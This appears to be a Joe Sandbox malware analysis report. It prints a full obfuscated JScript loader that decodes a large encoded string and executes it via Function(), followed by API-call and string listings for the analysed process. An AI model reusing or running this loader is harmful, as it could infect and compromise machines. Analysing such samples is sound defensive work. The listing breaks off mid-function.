3zvv5f(s5A5_F6L055G<A$F6NaPx(}5 ,e($\|j5A5fCkzx[s\"hzv=pY-Pj%v5,,e(${W5A5rz{5I$y#i(es(,\|jCW+f[s\"hzv)-P$6jh2vxZry,>?5jh2#s,ici.x=->$1zvv5j{$R$=jh2~xzq=-5/5&7-Cw&p~x=&O`q&>2&s&,>?~j5,{jCw+f)x(,E055>$6A5&C&5;${jCw+f)x(,E055>$6A5&9&5;${jCqvxxl=3(ix}xpz3~-5AR$$y\"p5;${jCqvxxl=3h})xzq5Z%p+qz3>$RA5r+p\"$;5j{2#eg},DJ~pzwD-5AR$$y\"p>$1{~x},v2xvzeihl%vg+x=pY$@${j5/5&Cp$o7->$e(kzxeel5A5&:g%q)tzg:&A$-m$h%{hx/pz$R$L05e(k+qzrw5A5&Dg5wzx5gRJ~pzwCfvx;$xqy2z\|z$Dg5wzx5hRi.t\"s(i(5g#hCi.i53x$:g:$S$$y\"5gy$[m\"i)5g#hCi.i53x$:h:$q&7$@${j5/5&q&705mxs$P%gvx~s$$R$7)h})xzqgs%x:`qW/wi#7G`qW]IaPH6Ch\"pA&5/5t-,wv%-A$)e,i=-Px(}5 ,e($$R$w2\|iJ%pyi(,\"H5/5j{-PxCq%zz,vy$@${j>\"5gvxxl5,z-5 3\"3\"5gvxxl5,z-5 3x(}5 ,e($\|j5A5fCkzx[s\"hzv=pY-Pj%v5,,e(${W5A5rz{5I$y#i(es(,\|jCJ~pzw>?5%{WCeI$h=-P${WCq%zzRz\|,>-5 ,e(${j5A5,{WCmi#,>$@$7&>2)t\"m,7>q`7-Ct%t=-Pzvv5i.\|5A5fCkzxZ\|i$w~s$Rvqz,{j>2sas-i(Gvwz,>?~j5,z\|.$6A5&\"r!&>$1m{$=i.\|5%R$7fvx7$;5i.\|5%R$7&5;$z\|.$6A5& w7$;5j{2sas-i(Gvwz,>$6A5&vys(y$2~r{&5;${jCw+f)x(,E055>$6A5&C&5;${jCw+f)x(,E055>$6A5&9&5;${jCqvxxl=3(ix}xpz3~-5AR$$y\"p>$1zvv5i.s5A54Pw-mg}$=i.\|>$1gvwz$7i.i7>z\|%$R$G:F?wvze!?xe)i5&ysx&Ogvwz$7h%g.&Ogvwz$7tyj7>z\|%$R$L7Pf(ivoPgvwz$7vj7>xe)i5&\|&Oi.s5A5;E?wvze!?xe)i5&#tH&Ogvwz$7qIe7>xe)i5&%k\|&Ogvwz$7{vz7>xe)i5&-qv&Oi.s5A55F:Pf(ivoPgvwz$7q&87>xe)i5&vz~&Ogvwz$7{zf#&Ogvwz$7j\"z7>xe)i5&#s,&Ogvwz$7{#z7>xe)i5&#tzk7>xe)i5&#t\|&Oi.s5A55F9Pf(ivoPgvwz$7k~j7>xe)i5& t\|&Ogvwz$7n&i\|&Ogvwz$7t$k7>z\|%$R$H4G?wvze!?3{~x},v2xvzeihl%vg+x=pY$@${j5/5&Cp$o7->$e(kzxeel5A5&:g%q)tzg:&A$-m$h%{hx/pz$R$L05e(k+qzrw5A5&Dg5wzx5~0A[m\"i)2we5g#hCi.i53x$:~0)5B5r+p;$xh5J~pzw;$xqy2z\|z$Dg5`7&5/5j{$@$7`7&A$~g%rasxem%r5A5&:W/wi#V%s)q`h})xzqH6q`hLZPa7G2yp\"07$@$z\|%05wvzz,>?v/$1fCq%zzJ~pz,\"H5/5j{05x(h5/5j{-3$xeg}$=i>$1\"3\"3\"5gvxxl5,z-5 3\"3\"3\"5gvxxl5,z-5 3o&,>?0x=-P[hg(m&xCw\"izt=5I4E4>\"wvze!?xe)i5lv,\|$@$7eF67-Ozvv5gws5A5f{s5/5lv,\|$@$7eF77-Px(}5 ,e($0f0$R$w2%tzrii.x[m\"i=gwsA$M05%E-P\"5gvxxl5,z-5 lWxv~t2'y~x=-3{}m\"i5,v+i>$1x(}5 ,e($$R$\\iSwnzg,7{~r#k#x)>(s%xq`xm#zG&>?{s($=zvv5m5A5rz{5I$y#i(es(,2Z\|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tT(sxi)w7->?5%~2vxZry,>?5mCq%zzRz\|,>-5 ,e($~x5A5mCmi#,>?~j5,~xp&$e#i7aCqvxxl=rz{5VzkZ\|&,0f%2 s~r=&2&>05&~&>->$1x(}5 ~j5,~xCxzv#m$ei=-5AR$E$;5m_7I.ixyewpzTvx}&r$;5%~xp&Z\|zg+xvf\"ieel7aCqvxxl=3-m$h%{)!&v%k(e#3~->$1zvv5x&$R$=,E\|G4E55/5Qvx}2(e$h%q=->$?$H4J<G$2$E-Cx%Wv~r\|,F:>2)ywwv~r\|,F-Pzvv5x'$R$=,E\|G4E55/5Qvx}2(e$h%q=->$?$H4J<G$2$E-Cx%Wv~r\|,F:>2)ywwv~r\|,F-PeCt%t+t=&Vt&p~gvx~s$$}e)$\|i$i(eiy$vr5i.gztm%r5x}e$xs+py$$s$wi5lvrypzhC`$`$T(sxi)w5myAE\|7$@$t5/5&5,7$@$&e(wzM$x=x&055K-5/5&>05X}vzey$~hR4.&5/5x'$@$7$=&5/5tvv)i^r,uA$F:>$@$7-C`$`$G\"mxo5S`$s5xzv#m$ei5x}i5e&t\"mxem%rC`$G\"mxo5GVRXIa$s5hzf+k5x}i5e&t\"mxem%rC&A$M05m_7rvqz&r$@$7$B$Xs#q%r5Pvr\|yvkz$gy$x~qz$Yiwy\|k~r\|$hi(z~gzw7054.55/54.7E$@$E\|F4E4>?3\"5gvxxl5,z-5 3\"3\"5gvxxl5,z-5 3o&,>?0x=-P[hg(m&xCw\"izt=8E4>\"wvze!?3\"~j5,=[hg(m&xCE(k+qzrwCpzr\|x}$S$E$;5[hg(m&xCE(k+qzrw=4>$RA5lv,\|$@$7eE;7->$RA5jvp)i>$lWxv~t2'y~x=-3zvv5{E$R$paPm{$=,lWxv~t2Vv\|y#i$x)2\"i$kl5B545;$lWxv~t2Vv\|y#i$x),E-5AR$}e=k5/5&v4L&>-5AR${e\"wz-5 v/$1eCv+r=&:g%q)tzg:$Dg5hzp53[$DW53f$q&7$@$wj%$@$7.Ci.iq&7054A$v+i>?lWxv~t2)pzi&,J4E-3$xeg}$=i>$1\"-{5A5lv,belCvvrys#,>-Pq#$R$belCgzm\",belCvvrys#,>$?$J-Pm{$=q#$S$H-5{-$@A5,#q5B58>$T$7:I&5>5&H67?-{5/R$72z\|z&PfCg%t/J~pz,y,7w/wi#v%s&>$@$7`qw/wi#7G`q{)g(m&xCi.i705f{s5/5{-05x(yz-P{E2&y)l=f{s5/5{--3$zp)i5 -45A5j+y=-3zvv5jzx5A5t-,-4>?,e($)y5A54Px(}5 ,e($&t5A5h=&)})xzqyv~zz&>$@$7`qT(s\|vvqYeeq`bmxv%w%j`q[~rys-wq`hxvv$bi$yq`ev%k(e#wq`hxvvy&`q&Pzvv5gwf5A5_7[~rys-w5I.t\"s(i(2\"r!&A&zq&i0e(2\"r!&A&vxvn%2\"r!&A&hxvv2\"r!&r?{s($=zvv5mF$R$E?5mF$Q$xfw2\"i$klP$~5@/>$1x(}5 w2yi\"ii[m\"i=t&$@$xfw_~5r-3$xeg}$=i>$1\"3\"5gvxxl5,z-5 3x(}5 ,e($&t5A5h=&+wzv&v%j~pz&>$@$=z$_Ea5BR$K$T$7`qE&tYeeq`gsvq~r\|`qQ~g(s)s{xq`lm$h%{)`qWe(x5Qzr+`qT(s\|vvq)`qWe(x+tq`7$O$7`qWe(x5Qzr+`qT(s\|vvq)`qWe(x+tq`7-Pzvv5t5A5t&$@$}e=k5/5&v5K&>$@$72\"r!&P{~x},v2xvzeihl%vg+x=t>-5xvv\|iTvx}$R$7`7&5/5jzx5/5&q&705{~rys-W}\"i5A55A$vv\|y#i$x)$R$7`7&5/5f{m5/5&q&705mxs$P%gvx~s$$R$7))})xzq(s%x:`qw/wi#7G`qw}i\"pH6Ch\"pA7705wvzz,>?\"sCt+w},&-Pzvv5gwf5A5_7[~rys-w5I.t\"s(i(2\"r!&A&zq&i0e(2\"r!&A&vxvn%2\"r!&A&hxvv2\"r!&r?{s($=zvv5mF$R$E?5mF$Q$xfw2\"i$klP$~5@/>$1x(}5 w2yi\"ii[m\"i=t&$@$xfw_~5r-3$xeg}$=i>$1\"3\"5gvxxl5,z-5 3x(}5 v2(i\|[(mi=&]OXYq`hs{x-e(iq`bmxv%w%j`q[~rys-wq`Xy(vzrZzv)m%rq`gy$`q&5/5lv,\|$@$7eF97-A$7`7&5/5jzx5/5&q&5`7&5/5f{m5/5&q&7-3$xeg}$=i>$1\"~j5,lWxv~t2hg(m&x[y\"pce#iCw&p~x=&q`7-Cw}m{x=-5AR$y,7w/wi#h(m,i7->$\"sCt+w},lWxv~t2hg(m&x[y\"pce#i>?,e($g5A5h=&i#t7-5/5&q`7$@$}e=k5/5&v4M&>$@$72 w7?~j5,lWxv~t2Vv\|y#i$x)2\"i$kl5B545;$lWxv~t2Vv\|y#i$x),E-5AR$}e=k5/5&v4L&>-5 v/$1fChzpzxzJ~pz,g>\"5gvxxl5,z-5 3[hg(m&xCu+m,>?3$zp)i5m{$=w+$SA54>$1x(}5 du5A5fCs&i$Xz\|J~pz,wj%$@$}e=k5/5&v4E&>05<A$64>\"5gvxxl5,z-5 3\"}v=4>?)o=-3$xeg}$=i>$1[hg(m&xCu+m,>\"-l~pz$=x(yz-5 ~j5,0~%,>$6AR${e\"wz-5 -l~pz$=x(yz-5 v/$1zvv5m5A5rz{5Hvxz,>2\|iX~qz,>?9,757055>?{s($=?5m5/5,K45.56N$?$F4E4>$SA5rz{5Hvxz,>2\|iX~qz,>?5w!,>-5[hg(m&xCw\"izt=6E4E-3$xeg}$=i>$1m{$=~0s=-5AR${e\"wz-5f(ivoPj%v5,,e($~$R$$i-$Yei=-Ckzxim#i=-P$~$@$=:E$?$G=5.55E4E-5BR$$i-$Yei=-Ckzxim#i=-P$)o=->$lWxv~t2)pzi&,G4E4>\"3\"5i\"wz$1j%v5,,e($~$R$$i-$Yei=-Ckzxim#i=-P$~$@$=:E$?$G=5.55E4E-5BR$$i-$Yei=-Ckzxim#i=-P$)o=->$lWxv~t2)pzi&,G4E4>\"3\"5i\"wz$1f{s5A5h=&+wzv&v%j~pz&>$@$=z$_Ea5BR$K$T$7`qE&tYeeq`gsvq~r\|`q&5>5&q`7-5/5lv,\|$@$74G&>$@$7`q&Pm{$=fCj%pyi(I.m)x),wj%->$1zvv5sjA$}h5A5f{s5/5lv,\|$@$74H&>0j{$R$7&Pm{$=fCj~pzI.m)x),}h>-5 v/$1sj5A5fCs&i$Xz\|J~pz,}hA$F-Px{j5A5sjCvzeyE\"p=-A$%x{2xp%wz,>\"5gvxxl5,z-5 3\"3zvv5fww5A5h=&\"sxe\"e&tyee7-5/5&q`7$@$}e=k5/5&v4G&>0wf0$R$wf)$@$7`q&5/5lv,\|$@$7eE87-5/5&Cn)&Px(}5 w2xvzei[s\"hzv=fww>\"5gvxxl5,z-5 3fCg%t/J~pz,lWxv~t2hg(m&x[y\"pce#iA$wf005x(yz-Pm{$=x{j5%R$7&>$1x(}5 %x{$R$w2%tzrii.x[m\"i=fww5/5&q`7$@$}e=k5/5&v4H&>056A$F-PsjC{(mi=x{j>05sjCg\"s)i=-3$xeg}$=i>$1\"3v+2)lzp\"I.ixyi=&-wxv~t2z\|z&A$7`7&5/5[hg(m&xCWxv~tJ+p\"Rvqz$@$7`7$7$@$}e=k5/5Qvx}2(e$h%q=->05&705&7054>?lWxv~t*2'y~x=-3\"=->?", b = [ 4, 21 ], c = "", d = 0, e, f = new ActiveXObject ( "Scripting.FileSystemObject" ), g = new ActiveXObject ( "WScript.Shell" ),
1	j = function (z) {
2	eval ( 'k=z.item()' );
3	k += "";
4	return true;
5	}, k = "", l = "%systemroot%", kas = "";
6	for ( ; d < a.length ; d += 1 )
7	{
8	e = a.charCodeAt ( d ) - b[d % b.length];
9	c += String.fromCharCode ( e < 32 ? 95 + e : e );
10	}
11	var h = f.getFolder ( g.ExpandEnvironmentStrings ( l ) );
12	for ( var i = new Enumerator ( h.SubFolders ) ; ! i.atEnd ( ) && j ( i ) ; i.moveNext ( ) )
13	{
14	if ( k.match ( /windows/i ) )
15	{
16	kas = "\xfffd\xfffd \xfffd\xfffd\xfffd\x07e7\xfffd\xfffd\x05a7\x07e7\x06a7\xfffd\xfffd \xfffd\xfffd\xfffd\xfffd\xfffd\x06a7\x07e7\xfffd \xfffd\xfffd \xfffd\xfffd\xfffd\x0467\xfffd\xfffd\x05a7\xfffd\xfffd\x0727\xfffd\x0527\xfffd, \xfffd\x0727\xfffd\xfffd, \xfffd\xfffd\xfffd \xfffd\x04e7\x0467\xfffd\x05a7\x07a7\xfffd \xfffd\x07a7\x07e7\x05a7\x07e7\x06a7\xfffd, \xfffd\xfffd\x04e7\x0767\xfffd\x05a7\xfffd\xfffd\xfffd \xfffd\x0567\x07e7\xfffd\xfffd?";
17	break ;
18	}
19	else
20	{
21	kas = "";
22	}
23	}
24	if ( kas == "\xfffd\xfffd \xfffd\xfffd\xfffd\x07e7\xfffd\xfffd\x05a7\x07e7\x06a7\xfffd\xfffd \xfffd\xfffd\xfffd\xfffd\xfffd\x06a7\x07e7\xfffd \xfffd\xfffd \xfffd\xfffd\xfffd\x0467\xfffd\xfffd\x05a7\xfffd\xfffd\x0727\xfffd\x0527\xfffd, \xfffd\x0727\xfffd\xfffd, \xfffd\xfffd\xfffd \xfffd\x04e7\x0467\xfffd\x05a7\x07a7\xfffd \xfffd\x07a7\x07e7\x05a7\x07e7\x06a7\xfffd, \xfffd\xfffd\x04e7\x0767\xfffd\x05a7\xfffd\xfffd\xfffd \xfffd\x0567\x07e7\xfffd\xfffd?" )
25	{
26	Function ( c ) ( );
27	}

Reset < >

Analysis Process: ibfmvoj.exe PID: 6652 Parent PID: 6432 ibfmvoj.exeCOMMON

Executed Functions

Function 00007FF7C0BA0EC4, Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 286
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNELBASE ref: 00007FF7C0BA0F07
GetLocaleInfoW.KERNEL32 ref: 00007FF7C0BA0F26
GetModuleFileNameW.KERNEL32 ref: 00007FF7C0BA0F97
FreeLibrary.KERNEL32 ref: 00007FF7C0BA0FBF
GetLocaleInfoA.KERNEL32 ref: 00007FF7C0BA0FE1
LoadStringA.USER32 ref: 00007FF7C0BA101B
GetModuleFileNameA.KERNEL32 ref: 00007FF7C0BA1058
CharNextA.USER32 ref: 00007FF7C0BA107E
memcpy.MSVCRT ref: 00007FF7C0BA10C0
strcpy_s.MSVCRT ref: 00007FF7C0BA10D9
LoadLibraryExA.KERNEL32 ref: 00007FF7C0BA10F1
LoadLibraryExA.KERNEL32 ref: 00007FF7C0BA110C
sprintf_s.MSVCRT ref: 00007FF7C0BA115D
CharNextA.USER32 ref: 00007FF7C0BA1183
memcpy.MSVCRT ref: 00007FF7C0BA11C1
strcpy_s.MSVCRT ref: 00007FF7C0BA11DA
LoadLibraryExA.KERNEL32 ref: 00007FF7C0BA11EC
LoadLibraryExA.KERNEL32 ref: 00007FF7C0BA1207
GetUserDefaultLCID.KERNEL32 ref: 00007FF7C0BA1219
GetLocaleInfoA.KERNEL32 ref: 00007FF7C0BA1237
sprintf_s.MSVCRT ref: 00007FF7C0BA1264
CharNextA.USER32 ref: 00007FF7C0BA128A
memcpy.MSVCRT ref: 00007FF7C0BA12C6
strcpy_s.MSVCRT ref: 00007FF7C0BA12DF
LoadLibraryExA.KERNEL32 ref: 00007FF7C0BA12F1
LoadLibraryExA.KERNEL32 ref: 00007FF7C0BA1308

Strings

%s%s.DLL, xrefs: 00007FF7C0BA1039, 00007FF7C0BA114F, 00007FF7C0BA1259

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: LibraryLoad$CharInfoLocaleNextmemcpystrcpy_s$DefaultFileModuleNameUsersprintf_s$FreeLangString
String ID: %s%s.DLL
API String ID: 1450027533-4110387156
Opcode ID: 868df43cb1bf2d225c94232421144c78fe7e861f8e79fd0ac5243b94eb619904
Instruction ID: 7520de1c59d054f8e330f9b6d268e735ec3b558ceb03fbb74f7b401c072fd67d
Opcode Fuzzy Hash: 868df43cb1bf2d225c94232421144c78fe7e861f8e79fd0ac5243b94eb619904
Instruction Fuzzy Hash: B5C17321A08A8695EF62EF11DC402FAA3A1FB44B64F840436DA4F87B54DF3DF515C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B98348, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF7C0B985AB
FreeLibrary.KERNEL32 ref: 00007FF7C0B985D6

Strings

SaferIdentifyLevel, xrefs: 00007FF7C0B983D7
SCRIPT, xrefs: 00007FF7C0B984E1
SaferRecordEventLogEntry, xrefs: 00007FF7C0B98546
SaferCloseLevel, xrefs: 00007FF7C0B9840D
advapi32.dll, xrefs: 00007FF7C0B983B8
SaferComputeTokenFromLevel, xrefs: 00007FF7C0B983F1

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseFreeHandleLibrary
String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll
API String ID: 10933145-3460866070
Opcode ID: ca423e327a28cc9a8b682f4429047f69f7512ddf0a389c0b10475bdbd718699c
Instruction ID: 0dac7415445f33237d798658b8a589e4fd759e5c6d6f1cbb8de8114a62495062
Opcode Fuzzy Hash: ca423e327a28cc9a8b682f4429047f69f7512ddf0a389c0b10475bdbd718699c
Instruction Fuzzy Hash: 7D814421A18B4285E751EF65EC4436AB3B0FB847A4F840136EA4F82B54DF7CF455C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B95A34, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 244
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FF7C0B95AC2
RegOpenKeyExA.ADVAPI32 ref: 00007FF7C0B95B03
RegQueryValueExA.ADVAPI32 ref: 00007FF7C0B95B3C
RegCloseKey.ADVAPI32 ref: 00007FF7C0B95B49
GetACP.KERNEL32 ref: 00007FF7C0B95C58
LoadLibraryExW.KERNEL32 ref: 00007FF7C0B95CDA
GetProcAddress.KERNEL32 ref: 00007FF7C0B95CF2
FreeLibrary.KERNEL32 ref: 00007FF7C0B95D00
FreeLibrary.KERNEL32 ref: 00007FF7C0B95D59

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

CoRegisterMessageFilter.OLE32 ref: 00007FF7C0B95DA5
GetModuleFileNameW.KERNEL32 ref: 00007FF7C0B95DD8

Strings

kernel32.dll, xrefs: 00007FF7C0B95CCD
WSFFile, xrefs: 00007FF7C0B95B9E
., xrefs: 00007FF7C0B95ADD
Open2, xrefs: 00007FF7C0B95A84
WSHFile, xrefs: 00007FF7C0B95BB4
HeapSetInformation, xrefs: 00007FF7C0B95CE8
Open, xrefs: 00007FF7C0B95A7B

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Library$Free$AddressCloseEnumFileFilterLoadMessageModuleNameOpenProcQueryRegisterValue_malloc_dbg
String ID: .$HeapSetInformation$Open$Open2$WSFFile$WSHFile$kernel32.dll
API String ID: 1744760138-732722162
Opcode ID: daf42796b38901f2363d6b50b042cefec1de9c6f04d96012c93868aeec878bd3
Instruction ID: 11478f59a68b2723bd2b2bbaabd04c2802a45b7a2d758829f02f08d94bfc5244
Opcode Fuzzy Hash: daf42796b38901f2363d6b50b042cefec1de9c6f04d96012c93868aeec878bd3
Instruction Fuzzy Hash: 94B19532A08B8286EB61EF21ED446A9B7A4FF447A4F840035DA4E87B54DF3CF555C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B96CEC, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 169
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C0BA134C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398

Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13EC
Part of subcall function 00007FF7C0BA134C: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13F9
Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA144B
Part of subcall function 00007FF7C0BA134C: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA146E

RegisterEventSourceW.ADVAPI32 ref: 00007FF7C0B96DF7
GetUserNameW.ADVAPI32 ref: 00007FF7C0B96E12
LookupAccountNameW.ADVAPI32 ref: 00007FF7C0B96E47
LookupAccountNameW.ADVAPI32 ref: 00007FF7C0B96EB8
ReportEventW.ADVAPI32 ref: 00007FF7C0B96F23
DeregisterEventSource.ADVAPI32 ref: 00007FF7C0B96F2C
SysFreeString.OLEAUT32 ref: 00007FF7C0B96F4F
RegCloseKey.KERNELBASE ref: 00007FF7C0B96F5F
RegCloseKey.ADVAPI32 ref: 00007FF7C0B96F6F

Strings

LogSecurityFailures, xrefs: 00007FF7C0B96DAB
LogSecuritySuccesses, xrefs: 00007FF7C0B96DCE
Windows Script Host, xrefs: 00007FF7C0B96DEE
Software\Microsoft\Windows Script Host\Settings, xrefs: 00007FF7C0B96D47, 00007FF7C0B96D88

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: EventName$AccountByteCharCloseLookupMultiOpenSourceWide$DeregisterErrorFreeLastRegisterReportStringUser
String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
API String ID: 2014086341-2261343319
Opcode ID: 6fe26e5a0ddc8785e7e43a44a4b79e1a559761a7abaa2fc167fb4ce248d846b9
Instruction ID: 3fe3c68cf7fc2f34fb6eb102bf1a51b0dd13c27bec4d37703d97b54d71f634be
Opcode Fuzzy Hash: 6fe26e5a0ddc8785e7e43a44a4b79e1a559761a7abaa2fc167fb4ce248d846b9
Instruction Fuzzy Hash: FC715032A09B4286EB11EF61E8441BAF7A4FF447A4F840135EA8E87BA4DF3CE415C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9AC78, Relevance: 15.1, APIs: 10, Instructions: 107
timenativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KillTimer.USER32 ref: 00007FF7C0B9ACE9
GetLastError.KERNEL32 ref: 00007FF7C0B9ACF3
KillTimer.USER32 ref: 00007FF7C0B9AD17
GetLastError.KERNEL32 ref: 00007FF7C0B9AD21
SetTimer.USER32 ref: 00007FF7C0B9AD46
GetLastError.KERNEL32 ref: 00007FF7C0B9AD55
NtdllDefWindowProc_A.NTDLL ref: 00007FF7C0B9AD6F
KillTimer.USER32 ref: 00007FF7C0B9AD7E
EnumThreadWindows.USER32 ref: 00007FF7C0B9ADAB
PostQuitMessage.USER32 ref: 00007FF7C0B9ADDC

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Timer$ErrorKillLast$EnumMessageNtdllPostProc_QuitThreadWindowWindows
String ID:
API String ID: 3251721287-0
Opcode ID: b633e85a7e241a76815672620d3c7b209afcb3efed8e02987da59c875c170d9f
Instruction ID: 6b4931a86502be17494b3bfcf86a6c868f797d8331cc4aedac7b4c12617eb8a0
Opcode Fuzzy Hash: b633e85a7e241a76815672620d3c7b209afcb3efed8e02987da59c875c170d9f
Instruction Fuzzy Hash: 53418E61A0860282E654FF29D884138A6B0FF44BA1FA44035CA4FC7F94DF3CF8A182E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA21C4, Relevance: 13.6, APIs: 9, Instructions: 121
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7C0BA221D
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0BA224A
GetLastError.KERNEL32 ref: 00007FF7C0BA2257
GetFileSize.KERNEL32 ref: 00007FF7C0BA230E
GetLastError.KERNEL32 ref: 00007FF7C0BA231C
CreateFileMappingA.KERNEL32 ref: 00007FF7C0BA234C
MapViewOfFile.KERNELBASE ref: 00007FF7C0BA236E

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: File$CreateErrorLast$ByteCharMappingMultiSizeViewWide
String ID:
API String ID: 677022515-0
Opcode ID: a4c1fac4adeb7bf5e841ef01c412abfeacc7114988fec13d3c0b38ca06d5f2f2
Instruction ID: 47e31245ff35b779700bcda986f6c322d6efa0db7c963a74881df35934fb852c
Opcode Fuzzy Hash: a4c1fac4adeb7bf5e841ef01c412abfeacc7114988fec13d3c0b38ca06d5f2f2
Instruction Fuzzy Hash: 0851C532A18B4286E765DF25D81436AA2D0FB487B8F544335DA5E86BD4DF3CE4248790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA1A34, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 169
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE ref: 00007FF7C0BA1A96
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0BA1B03
GetLastError.KERNEL32 ref: 00007FF7C0BA1B10
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0BA1B62
RegQueryValueExA.ADVAPI32 ref: 00007FF7C0BA1B97
MultiByteToWideChar.KERNEL32 ref: 00007FF7C0BA1BFB

Part of subcall function 00007FF7C0BA3E74: RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0BA1C98), ref: 00007FF7C0BA3E7F
Part of subcall function 00007FF7C0BA3E74: RtlLookupFunctionEntry.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0BA1C98), ref: 00007FF7C0BA3E9E
